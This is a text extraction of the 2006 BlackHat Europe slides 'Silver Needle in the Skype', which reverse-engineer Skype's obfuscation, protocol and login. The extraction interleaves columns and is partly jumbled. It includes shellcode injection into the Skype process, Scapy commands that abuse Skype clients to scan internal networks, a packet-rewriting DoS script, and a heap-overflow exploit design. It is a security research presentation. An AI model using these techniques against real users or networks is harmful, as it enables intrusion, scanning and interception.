Professional Documents
Culture Documents
Skype seen from the network Skype seen from the network
Advanced/diverted Skype functions Advanced/diverted Skype functions
Outline
1 Context of the study
2 Skype protections
Silver Needle in the Skype Binary packing
Code integrity checks
Anti debugging technics
Philippe BIONDI Fabrice DESCLAUX Code obfuscation
3 Skype seen from the network
phil(at)secdev.org / philippe.biondi(at)eads.net Skype network obfuscation
serpilliere(at)rstack.org / fabrice.desclaux(at)eads.net
EADS Corporate Research Center — DCR/STI/C
Low level data transport
IT sec Lab Thought it was over?
Suresnes, FRANCE How to speak Skype
4 Advanced/diverted Skype functions
BlackHat Europe, March 2nd and 3rd , 2006
Analysis of the login phase
Playing with Skype Traffic
Nice commands
5 Conclusion
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 1/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 2/98
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 3/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 4/98
Skype protections Skype protections
Skype seen from the network Skype seen from the network
Advanced/diverted Skype functions Advanced/diverted Skype functions
5.5e+06
The Chief Security Officer point of view
5e+06
Is Skype a backdoor ?
4.5e+06
Can I distinguish Skype’s traffic from real data exfiltration ?
connected
Can I block Skype’s traffic ? 4e+06
3e+06
2.5e+06
2e+06
0 500 1000 1500 2000 2500
time
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 5/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 6/98
Binary packing
Skype protections Skype protections
Code integrity checks
Skype seen from the network Skype seen from the network
Anti debugging technics
Advanced/diverted Skype functions Advanced/diverted Skype functions
Code obfuscation
Clear part
Encrypted part
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 7/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 9/98
Binary packing Binary packing
Skype protections Skype protections
Code integrity checks Code integrity checks
Skype seen from the network Skype seen from the network
Anti debugging technics Anti debugging technics
Advanced/diverted Skype functions Advanced/diverted Skype functions
Code obfuscation Code obfuscation
Skype
import table
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 10/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 11/98
Skype
import table
Old Skype
import table
Libraries used in hidden imports
KERNEL32.dll
New full 674 classic imports WINMM.dll
import 169 hidden imports WS2 32.dll
table
RPCRT4.dll
...
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 12/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 13/98
Binary packing Binary packing
Skype protections Skype protections
Code integrity checks Code integrity checks
Skype seen from the network Skype seen from the network
Anti debugging technics Anti debugging technics
Advanced/diverted Skype functions Advanced/diverted Skype functions
Code obfuscation Code obfuscation
Interesting characteristics
Each checksumer is a bit different: they seem to be
polymorphic But...
They are composed of
They are executed randomly
A pointer initialization
The pointers initialization is obfuscated with computations
A loop
The loop steps have different values/signs
A lookup
Checksum operator is randomized (add, xor, sub, ...)
A test/computation
Checksumer length is random
We can build a script that spots such code
Dummy mnemonics are inserted
Final test is not trivial: it can use final checksum to compute
a pointer for next code part.
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 17/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 18/98
Binary packing Binary packing
Skype protections Skype protections
Code integrity checks Code integrity checks
Skype seen from the network Skype seen from the network
Anti debugging technics Anti debugging technics
Advanced/diverted Skype functions Advanced/diverted Skype functions
Code obfuscation Code obfuscation
Solution 1
Put a breakpoint on each checksumer
Collect all the computed values during a run of the program
Each rectangle represents a checksumer J Software breakpoints change the checksums
An arrow represents the link ² We only have 4 hardware breakpoints
checker/checked =⇒ Twin processes debugging
In fact, there were nearly 300 checksums
Solution 2
Emulate the code
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 19/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 20/98
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 21/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 22/98
Binary packing Binary packing
Skype protections Skype protections
Code integrity checks Code integrity checks
Skype seen from the network Skype seen from the network
Anti debugging technics Anti debugging technics
Advanced/diverted Skype functions Advanced/diverted Skype functions
Code obfuscation Code obfuscation
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 23/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 24/98
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 28/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 29/98
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 30/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 31/98
Binary packing Binary packing
Skype protections Skype protections
Code integrity checks Code integrity checks
Skype seen from the network Skype seen from the network
Anti debugging technics Anti debugging technics
Advanced/diverted Skype functions Advanced/diverted Skype functions
Code obfuscation Code obfuscation
Code obfuscation
Solution The goal is to protect code from being reverse engineered
The random memory page is allocated with special Principle used here: mess the code as much as possible
characteristics
So breakpoint on malloc(), filtered with those properties in Advantages
order to spot the creation of this page Slows down code study
We then spot the pointer that stores this page location Avoids direct code stealing
We can then put an hardware breakpoint to monitor it, and
break in the detection code Drawbacks
Slows down the application
Grows software size
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 32/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 34/98
sub 9F8F70 :
mov eax , 9FFB40h Determined conditional jumps
mov eax , [ e c x +34h ]
sub eax , 7 F80h
push esi
mov edx , 7799 C1Fh
mov e s i , [ e c x +44h ] ...
mov ecx , [ ebp −14h ]
sub eax , 292 C1156h
call eax ; s u b _ 9 F 7 B C 0 i f ( s i n ( a ) == 42 ) {
add e s i , eax
neg eax
mov eax , 371509EBh do dummy stuff ( ) ;
add eax , 19 C87A36h
sub eax , edx
mov edx , 0CCDACEF0h
mov [ e c x +44h ] , e s i }
mov ecx , [ ebp −14h ]
call eax
xor eax , 40 F0FC15h go on ( ) ;
pop esi
; eax = 009 F8F70
retn
...
Principle
Each call is dynamically computed: difficult to follow statically
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 35/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 36/98
Binary packing Binary packing
Skype protections Skype protections
Code integrity checks Code integrity checks
Skype seen from the network Skype seen from the network
Anti debugging technics Anti debugging technics
Advanced/diverted Skype functions Advanced/diverted Skype functions
Code obfuscation Code obfuscation
lea
edx , [ e s p+4+v a r 4 ] Sometimes, the code raises
add eax , 3D4D101h an exception
push o f f s e t area
push edx An error handler is called Bypassing this little problem
mov
[ e s p+0Ch+v a r 4 ] , eax
If it’s a fake error, the In some cases we were able to avoid the analysis
call RaiseException handler tweaks memory We injected shellcodes to parasitize these functions
rol eax , 17 h
xor eax , 350CA27h
addresses and registers
pop ecx =⇒ back to the calling code
Principle
Hard to understand the whole code: we have to stop the error
handler and study its code.
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 37/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 38/98
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 40/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 41/98
Skype network obfuscation Skype network obfuscation
Skype protections Skype protections
Low level data transport Low level data transport
Skype seen from the network Skype seen from the network
Thought it was over? Thought it was over?
Advanced/diverted Skype functions Advanced/diverted Skype functions
How to speak Skype How to speak Skype
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 42/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 43/98
Note:
RC4 is used for obfuscation not for privacy
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 44/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 45/98
Skype network obfuscation Skype network obfuscation
Skype protections Skype protections
Low level data transport Low level data transport
Skype seen from the network Skype seen from the network
Thought it was over? Thought it was over?
Advanced/diverted Skype functions Advanced/diverted Skype functions
How to speak Skype How to speak Skype
v o i d main ( v o i d )
{
u n s i g n e d c h a r key [ 8 0 ] ;
v o i d (∗ o r a c l e ) ( u n s i g n e d c h a r ∗key , i n t s e e d ) ;
i n t s , f l e n ; unsigned i n t i , j , k ; $ shellforge.py -R oracle_shcode.c | tee oracle.bin | hexdump -C
s t r u c t s o c k a d d r u n sa , from ; c h a r path [ ] = " / tmp / oracle " ; 00000000 55 89 e5 57 56 53 81 ec cc 01 00 00 e8 00 00 00 |U..WVS..........|
o r a c l e = ( v o i d ( ∗ ) ( ) ) 0 x0724c1e ; 00000010 00 5b 81 c3 ef ff ff ff 8b 93 e5 01 00 00 8b 8b |.[..............|
s a . s u n f a m i l y = AF UNIX ; [...]
f o r ( s = 0 ; s < s i z e o f ( path ) ; s++) 000001d0 fe ff ff 53 bb 0b 00 00 00 cd 80 5b e9 27 ff ff |...S.......[.’..|
s a . s u n p a t h [ s ] = path [ s ] ;
s = s o c k e t ( PF UNIX , SOCK DGRAM, 0 ) ; u n l i n k ( path ) ; 000001e0 ff 2f 74 6d 70 2f 6f 72 61 63 6c 65 00 |./tmp/oracle.|
b i n d ( s , ( s t r u c t s o c k a d d r ∗)&sa , s i z e o f ( s a ) ) ; $ siringe -f oracle.bin -p ‘pidof skype‘
while (1) {
$ ls -lF /tmp/oracle
f l e n = s i z e o f ( from ) ; srwxr-xr-x 1 pbi pbi 0 2006-01-16 13:37 /tmp/oracle=
r e c v f r o m ( s , &i , 4 , 0 , ( s t r u c t s o c k a d d r ∗)&from , &f l e n ) ;
f o r ( j =0; j <0x14 ; j ++)
∗( u n s i g n e d i n t ∗ ) ( key+4∗ j ) = i ;
o r a c l e ( key , i ) ;
s e n d t o ( s , key , 8 0 , 0 , ( s t r u c t s o c k a d d r ∗)&from , f l e n ) ;
}
u n l i n k ( path ) ; c l o s e ( s ) ; e x i t ( 5 ) ;
}
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 46/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 47/98
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 48/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 50/98
Skype network obfuscation Skype network obfuscation
Skype protections Skype protections
Low level data transport Low level data transport
Skype seen from the network Skype seen from the network
Thought it was over? Thought it was over?
Advanced/diverted Skype functions Advanced/diverted Skype functions
How to speak Skype How to speak Skype
Object List
Packet compression
List size Number
An object can be a number, a Each packet can be compressed
string, an IP:port, or even another IP:port The algorithm used: arithmetic compression
object list
List of numbers
Zip would have been too easy ©
Each object has an ID
Skype knows which object String Principle
corresponds to which command’s
Close to Huffman algorithm
parameter from its ID RSA key
Reals are used instead of bits
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 51/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 53/98
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 57/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 58/98
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 59/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 60/98
Skype network obfuscation
Skype protections Skype protections Analysis of the login phase
Low level data transport
Skype seen from the network Skype seen from the network Playing with Skype Traffic
Thought it was over?
Advanced/diverted Skype functions Advanced/diverted Skype functions Nice commands
How to speak Skype
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 61/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 63/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Moduli
Trusted data
push o f f s e t " * Lib / Connection / LoginServers "
push 45 h Each message signed by one of the Skype modulus is trusted
push o f f s e t " 80 .160.91.5 :33033 212 .72.49.141 :33033 "
mov ecx , eax The client and the Login server have a shared secret: a hash
call sub 98A360 of the password
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 64/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 65/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Key exchange
Session parameters
The client hashes its logink\nskyper\nkpassword with MD5
When a client logs in, Skype will generate two 512 bits length
The client ciphers its public modulus and the resulting hash
primes
with K
This will give 1024 bits length RSA private/public keys
The client encrypts K using RSA with one of the trusted
Those keys represent the user for the time of his connection Skype modulus
The client generates a symetric session key K He sends the encrypted session key K and the ciphered data
to the login server
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 66/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 67/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Skype modulus Rand 192 bits Login \nskyper\n Password Session behavior
If the hash of the password matches, the login associated with
the public key is dispatched to the supernodes
RSA 1536 bits Session key MD5
This information is signed by the Skype server.
Note that private informations are signed by each user.
Hash (SHA160 based) User modulus Shared secret
Search for buddy
If you search for a login name, a supernode will send back this
256 bits key Cipher (AES 256 based) couple
You receive the public key of the desired buddy
Encrypted session key Encrypted shared secret The whole packet is signed by a Skype modulus
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 68/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 69/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 70/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 72/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
TCP stream begin with a 14 byte long payload Skype NAck packet characteristics
From which we can recover 10 bytes of RC4 stream 28+11=39 byte long packet
RC4 stream is used twice and we know 10 of the 14 first bytes Function & 0x8f = 7
crypted stream 1 crypted stream 2
Bytes 31-34 are (one of) the public IP of the network
Seed
7f 4e 77
Skype SoF 52 7c 48 33 83 b0 86 56
Recovered Skype traffic id 0x7f4e
func 0x77
Skype NAck
RC4 stream (10 bytes) src 82.124.72.51
dst 131.176.134.86
known cleartext
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 73/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 74/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 75/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 76/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
We did not find any command to shutdown Skype i p t a b l e s −I FORWARD −p udp −m l e n g t h −−l e n g t h 39 −m u32 \
−−u32 ’27&0 x 8 f =7 ’ −−u32 ’31=0 x01020304 ’ − j QUEUE
But if we had a subtle DoS to crash the communication
manager...
=⇒ ... we could detect and replace every NAck by a packet from i p q u e u e i m p o r t ∗ ; from s t r u c t i m p o r t pack , unpack
triggering this DoS q = IPQ (IPQ COPY PACKET)
while 1:
p = q . read ()
p k t = p [PAYLOAD]
i h l = ( o r d ( p k t [ 0 ] ) & 0 x f ) << 2
c = c r c 3 2 (2∗∗32 −1 , p k t [ 1 5 : 1 1 : − 1 ] + " \ x00 " ∗ 8 )
x , i p l e n , y , i p c h k = unpack ( " !2 sH6sH " , p k t [ : 1 2 ] )
i p l e n += 4 ; i p c h k −= 4
newpkt = pack ( " !2 sH6sH " , x , i p l e n , y , i p c h k )+ p k t [ 1 2 : i h l +4] \
+pack ( " ! HxII " , 2 3 , 2 , c)+" sorry , censored until fixed "
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 77/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 78/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
How to generate traffic without the seed to RC4 key engine Firewall testing (a.k.a remote scan)
Let’s TCP ping Slashdot
Source IP Destination IP ID \x00\x00
>>> send(IP(src="1.2.3.4",dst="172.16.72.19")/UDP(sport=1234,dport=1146)
IV
/Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=41, is_req=0,
CRC32 is_b0=1, val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=1)
Get the RC4 key for a /Skype_Obj_INET(id=0x11, ip="slashdot.org", port=80)))
given seed for once
Always use this key to A TCP connect scan from the inside
encrypt seed >>> send(IP(src="1.2.3.4",dst="172.16.72.19")/UDP(sport=1234,dport=1146)
Calculate the CRC stuff /Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=41, is_req=0,
is_b0=1, val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=1)
Use IV = seed ⊕ crc seed to RC4 key engine /Skype_Obj_INET(id=0x11, ip="172.16.72.1", port=(0,1024))))
RC4 key (80 bytes) A look for MS SQL from the inside
>>> send(IP(src="1.2.3.4",dst="172.16.72.19")/UDP(sport=1234,dport=1146)
/Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=41, is_req=0,
is_b0=1, val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=1)
/Skype_Obj_INET(id=0x11, ip="172.16.72.*", port=1433)))
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 79/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 81/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 82/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 83/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Just ask
Each supernode knows almost all other supernodes
This command actually ask for at most 100 supernodes from
slot 201
>>> sr1(IP(dst="67.172.146.158")/UDP(sport=31337,dport=4344)/Skype_SoF(
id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=6, reqid=RandShort(),
val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=2)
/Skype_Obj_Num(id=0,val=201)/Skype_Obj_Num(id=5,val=100)))
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 84/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 85/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Parallel world: build your own Skype Private Network Dark network is not enough
Skype is linked to the network because it contains: Dr Evil, your network is not wide enough!
hard-coded RSA keys The use of relay manager is not authenticated
Skype servers’ IP/PORT Your Supernode can request official network relay managers
Skype Supernodes IP/PORT . . . and feed your own nodes with them
Algorithm
You are Skype Inc:
You are the certificate authority lea ecx , [ e s p+a r g 4 ]
push ecx
You can intercept and decrypt session keys call get uint
add esp , 0Ch 1 Read an unsigned int NUM
Job’s done. test al , a l from the packet
jz parse end
You are not Skype Inc: mov edx , [ e s p+a r g 4 ] 2 This integer is the number
lea eax , ds : 0 [ edx ∗ 4 ] of unsigned int to read next
Build your own Skype Private Network push eax
Lure your victim into using your modified Skype version
mov [ e s i +10h ] , eax 3 malloc 4*NUM for storing
call LocalAlloc
mov ecx , [ e s p+a r g 4 ]
those data
You can intercept and decrypt session keys
mov [ e s i +0Ch ] , eax
Job’s done.
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 88/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 89/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Algorithm
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 90/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 91/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Good exploit
In theory, exploiting a heap on Windows XP SP2 is not very Design of the exploits
stable We need the array object to be decoded
But Skype has some Oriented Object parts It only needs to be present in the object list to be decoded
It has some structures with functions pointers in the heap We can use a string object in the same packet to store the
If the allocation of the heap is close from this structure, the shellcode
overflow can smash function pointers String objects are stored in a static place (almost too easy)
And those functions are often called
=⇒ Even on XP SP2, the exploit is possible ©
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 92/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 93/98
Skype protections Analysis of the login phase Skype protections Analysis of the login phase
Skype seen from the network Playing with Skype Traffic Skype seen from the network Playing with Skype Traffic
Advanced/diverted Skype functions Nice commands Advanced/diverted Skype functions Nice commands
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 94/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 95/98
Skype protections Skype protections
Skype seen from the network Skype seen from the network
Advanced/diverted Skype functions Advanced/diverted Skype functions
Conclusion Conclusion
Ho, I almost forgot . . .
Good points
Skype was made by clever people
Good use of cryptography
Bad points
Hard to enforce a security policy with Skype
Jams traffic, can’t be distinguished from data exfiltration h Caution
Incompatible with traffic monitoring, IDS Never ever type
Impossible to protect from attacks (which would be /eggy prayer or
obfuscated) /eggy indrek@mare.ee
Those men who tried
Total blackbox. Lack of transparency.
aren’t here to speak about
No way to know if there is/will be a backdoor
what they saw. . .
Fully trusts anyone who speaks Skype.
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 96/98 Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 97/98
References
References
P. Biondi, Scapy
http://www.secdev.org/projects/scapy/
P. Biondi, Shellforge
http://www.secdev.org/projects/shellforge/
P. Biondi, PytStop
http://www.secdev.org/projects/pytstop/
P. Biondi, Siringe
http://www.secdev.org/c/siringe.c
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 98/98